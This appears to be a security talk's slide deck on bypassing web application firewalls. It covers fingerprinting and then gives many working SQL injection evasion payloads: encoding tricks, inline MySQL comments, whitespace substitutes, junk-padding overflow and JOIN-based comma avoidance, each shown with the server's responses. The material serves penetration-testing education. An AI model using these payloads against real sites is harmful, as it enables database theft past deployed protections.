WAF Bypassing Techniques

Avinash Kumar Thapa, Senior Security Analyst in Network

Intelligence India
Bug Hunter on Hackerone
CTF Author on Vulnhub.com
Some exploits and PoC on Exploit-db as well.
Passionate about Web Applications Security and Exploit Writing.
 Agenda
Introduction to Web Applications Firewalls
Operation Modes
Vendors
Fingerprinting WAF
Ways to Bypass WAFs
Practical Cases for Bypassing
Conclusion
 Introduction to Web Application Firewalls

Presents as Application Layer

Monitors all HTTP/HTTPs/SOAP/XML-RPC Web services traffic between client and servers
based upon their pre-defined signatures in a database.
Basic goal of WAF is to monitor and block the contents that violates pre-defined policy.
These pre-defined policies are patterns of user input which ends up in potential attack.
Understands HTTP and HTTPs traffic better than any traditional firewall.
Types of Operation Modes
 Negative Mode
A negative security model recognize attacks by relying on a database of expected attack
signatures.
Example:
Do not allow in any page, any argument value (user input) which match potential XSS
strings like <script>,</script>, String.fromCharCode, etc.

Pros:
Less time to implement.

Cons:
Less protection.
 Positive Model
A positive security model enforces positive behaviour by learning the application logic and the
building a security policy of valid known requests as a user interacts with the application.
Example:
Page news.jsp, the field id could only accept characters [0-9] and starting at number 0 until
65535.
Using intval conditions on page. (Accepts only integers)
Pros:
Better performance (less rules).
Less false positives.
Cons:
Much more time to implement.
Some vendors provide automatic learning mode, they help, but are far from perfect,
in the end, you always need a skilled human to review the policies
 Mix Model

Combination of both positive and negative model.

 Testing Environments
Google Chrome
Mozilla Firefox
Internet Explorer
Opera Browser
 Products
F5 BIG IP WAF
Sucuri
Modsecurity
Imperva Incapsula
PHP-IDS (PHP Intrusion Detection System)
Quick Defense
AQTRONIX WebKnight (For IIS and based on ISAPI filters)
Barracuda WAF
 Fingerprinting WAF
Adds Cookie to the HTTP Communication.
For Citrix Netscaler WAF
 Fingerprinting WAF
F5 BIG IP ASM
 Fingerprinting WAF
On the basis of HTTP Response
Other WAFs may be detected by the type of http response we receive when submitting a
malicious request, responses may vary depending upon a WAF to a WAF. Some of the
common responses are 403, 406, 419, 500, 501 etc.
 Fingerprinting WAF
Response for BIG F5
 Fingerprinting WAF
Request and Response for ModSecurity Firewall

Request:
 Fingerprinting WAF
Request and Response for ModSecurity Firewall

Response:
 Fingerprinting WAF
Response for WebKnight Firewall

Response:
 Fingerprinting WAF
Response for WebKnight Firewall

Response rendered on Browser

 Automatic Fingerprinting WAF
Using Nmap Scripts

nmap -p80 --script http-waf-detect <host>

Using WaFw00f.py

Python Wafw00f.py url <URL>

 Techniques to Bypass WAFs

Bypassing WAF For SQL Injection Vulnerabilities

Bypassing WAF for XSS Issues
Bypassing WAF for LFI and RFI vulnerabilities.
General Techniques to bypass WAF
Null Character Injection
Mixed Case
Inline Comments
Chunked Requests
Buffer Overflow
HTTP Parameter Pollution
URL encoding
Keyword Splitting
Replaced Keywords
Ignoring Cookies
Using Data URIs
Header Injection
Bypassing WAF For SQL Injection Vulnerabilities
 Example 1 (Without WAF)

https://abc.com/index.php?id=1
You have an error in your SQL syntax; check the manual that corresponds to your
MySQL server version for the right syntax to use near '1 ' at line 6

Example 1 (With WAF)

https://abc.com/index.php?id=1
HTTP/1.1 403 Forbidden Error
Or
HTTP/1.1 406 Not Acceptable
or
HTTP/1.1 404 Not Found
Or
HTTP/1.1 500 Internal Server Error
Or
HTTP/1.1 400 Bad Request
 Some recon on WAF

Came to know Modsecurity is in action

https://abc.com/index.php?
id=1
HTTP/1.1 200 OK

https://abc.com/index.php? %27 This technique is URL

id=1 Encoding
You have an error in your SQL syntax; check the manual that corresponds to your
MySQL server version for the right syntax to use near '1 ' at line 6

Some time you need to use:

1) Double URL Encoding :- %2527%27
2) Triple URL Encoding:- %252525%2527%27 (This is very rare Case)
 https://abc.com/index.php? %27 ORDER BY 1%23
id=1
HTTP/1.1 403 Forbidden

Assumptions in mind
Order keyword is Blocked ??
Order by keyword is Blocked ??
Any other alternative of Order by query ??
Does Spaces are blocked

Lets Try
 https://abc.com/index.php? %27 ORDER %23
id=1
HTTP/1.1 403 Forbidden

Assumptions in mind
Order keyword is Blocked
Check again order is blocked ??

https://abc.com/index.php? %27ORDER%23
id=1
HTTP/1.1 200 OK
New Assumptions in mind
Order keyword is not Blocked
What is blocked then ???

SPACES ARE BLOCKED

https://abc.com/index.php? %27 ORDER by 1 %23
id=1
HTTP/1.1 403 Forbidden

https://abc.com/index.php? %27ORDERby1 %23

id=1
HTTP/1.1 200 OK

No Assumptions in mind

Because spaces are blocked only

 Techniques to bypass spaces
Using + instead of space like:- order+by+1 (Mostly blocked)

Using inline comments instead of spaces /**/ like:-

order/**/by/**/1
Using combination of inline comments and URL encoding instead of
spaces like:
Order/%2a%2a/by/%2a%2a/1
Order%2f**%2fby%2f**%2f1

Using combination of inline comments, URL encoding & Junk Characters instead
of spaces like:
Order/%2aJUNKCHARACTERS%2a/by/%2aJUNKCHARACTERS%2a/1
Order%2f*JUNKCHARACTERS*%2fby%2f**JUNKCHARACTERS%2f1
 Techniques to bypass spaces

Using white space characters %0a, %0b, %0c, %0d,%a0,%09,%01

Query will be
ORDER%0aby%0a1
ORDER%0bby%0b1
ORDER%0cby%0c1
ORDER%0Dby%0D1
ORDER%A0by%A01
ORDER%0D%0Aby%0D%0A1
 https://abc.com/index.php? %27/**/ORDER/**/by/**/1%2
id=1 3

HTTP/1.1 200 OK

Lets Suppose no. of columns are

3

https://abc.com/index.php? %27 UNION SELECT

id=1 1,2,3%23
HTTP/1.1 403 Forbidden

Assumptions in mind
Spaces are Blocked ??
https://abc.com/index.php? %27/**/UNION/**/SELECT/**/1,2,3%23
id=1
HTTP/1.1 403 Forbidden

Assumptions in mind
Spaces were bypassed using inline
comments..Still blocked???
UNION keyword is blocked ??
SELECT keyword is blocked ??
Intergers are blocked ??
Commas are blocked ?
Combination of UNION SELECT is blocked
SELECT with Integers are blocked
 Techniques to Bypass
If UNION is blocked

Using Inline comments:

/!*50000UNION*/
/*!40000UNION*/
/*!00000UNION*/

Using URL Encoding Techniques: Double URL Encoding

%53nion
%2553nion
%55%4e%49%4f%4e (UNION) Triple URL Encoding
https://abc.com/index.php? %27/**//*!50000UNION*//**/SELECT/**/1,2,3%23
id=1
https://abc.com/index.php? %27/**//*!40000UNION*//**/SELECT/**/1,2,3%23
id=1
https://abc.com/index.php? %27/**//*!%55NION*//**/SELECT/**/1,2,3%23
id=1
https://abc.com/index.php? %27/**//*!%55NIoN*//**/SELECT/**/1,2,3%23
id=1

HTTP/1.1 403 Forbidden

Assumptions in mind
UNION keyword is blocked ??
SELECT keyword is blocked ??
Intergers are blocked ??
Commas are blocked ?
Combination of UNION SELECT is blocked
SELECT with Integers are blocked
https://abc.com/index.php? %27/**//*!50000UNION*//**//*!
id=1 50000SELECT*//**/1,2,3%23
https://abc.com/index.php? %27/**//*!40000UNION*//**//*!
id=1 40000SELECT*//**/1,2,3%23
https://abc.com/index.php? %27/**//*!%55NION*//**//*!%53ELECT*//**/1,2,3%23
id=1
https://abc.com/index.php? %27/**//*!%55NIoN*//**//*!%53ELeCT*//**/1,2,3%23
id=1

HTTP/1.1 403 Forbidden

Assumptions in mind
UNION keyword is blocked ??
SELECT keyword is blocked ??
Intergers are blocked ??
Commas are blocked ?
Combination of UNION SELECT is blocked
SELECT with Integers are blocked
https://abc.com/index.php? %27/**//*!50000UNION*/1,2,3%23
id=1

HTTP/1.1 200 OK

https://abc.com/index.php? %27/**//*!50000SELECT*/1,2,3%23
id=1

HTTP/1.1 200 OK

Assumptions in mind
UNION keyword is NOT blocked.
SELECT keyword is NOT blocked.
Intergers are NOT blocked
Commas are NOT blocked
Combination of UNION SELECT is blocked ?
SELECT with Integers are NOT blocked
 Techniques to bypass combination of union select
Using combination of inline comments and URL encoding :
/*!50000%55niOn*/ /*!50000%53eLECT*/

Using white spaces and URL encoding of comments (#)

Union%23%0aSELECT
Union%23%0bSELECT
Union%23%0cSELECT
Union%23%0DSELECT
Union%23%A0SELECT

Using combination of inline comments and URL encoding :

/*!50000%55niOn*/ /*!50000%53eLECT*/
Techniques to bypass combination of union select

Using Buffer Overflow

UNION
%23ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890%0ASELECT
Some time need to increase the junk as per the requirement

UNION
%23XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
Techniques to bypass combination of union select
Using Distinct statement

UNION DISTINCT SELECT

Using Distinctrow statement

UNION DISTINCTROW SELECT

 https://abc.com/index.php?
id=1
%27/**/UNION
%23XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%0ASELECT/**/1,2,3%23
HTTP/1.1 200 OK
Special Case : What if Commas got
blocked ?
https://abc.com/index.php? %27/**/UNION/**/SELECT/**/1,2,3%23
id=1

HTTP/1.1 403 Forbidden

Assumptions in mind
UNION keyword is NOT blocked.
SELECT keyword is NOT blocked.
Intergers are NOT blocked
Commas are blocked
Combination of UNION SELECT is NOT
blocked ?
SELECT with Integers are NOT blocked

Time to bypass commas ,.

 Basic Bypasses
URL Encoding - %2c ,
Double URL Encoding - %252c %2c ,
Using Inline Comments - /*!*/ like UNION SELECT 1/*!,*/2
 Basic Bypasses
URL Encoding - %2c ,
Double URL Encoding - %252c %2c ,
Using Inline Comments - /*!*/ like UNION SELECT 1/*!,*/2
 Advance way to bypass Commas
Using JOIN

JOIN used for columns as UNION is used for the rows

We have SELECT 1,2,3

SELECT * FROM (SELECT 1)a JOIN (SELECT 2)b JOIN (SELECT 3)c
 Advance way to bypass Commas
https://abc.com/index.php? %27/**/UNION/**/SELECT/**/*/**/FROM/**/
id=1 (SELECT/**/1)a/**/JOIN/**/(SELECT/**/2)b%23

HTTP/1.1 200 OK
Similar Approach for other Vulnerabilities
For XSS
For LFI / RFI

DEMO TIME
References
Images in slides 10,11,14,15,16,17 Taken from
http://www.mediafire.com/download/7a57hv5z25s58lh/WAF_Byp
assing_By_RAFAYBALOCH.pdf

Thank
you..!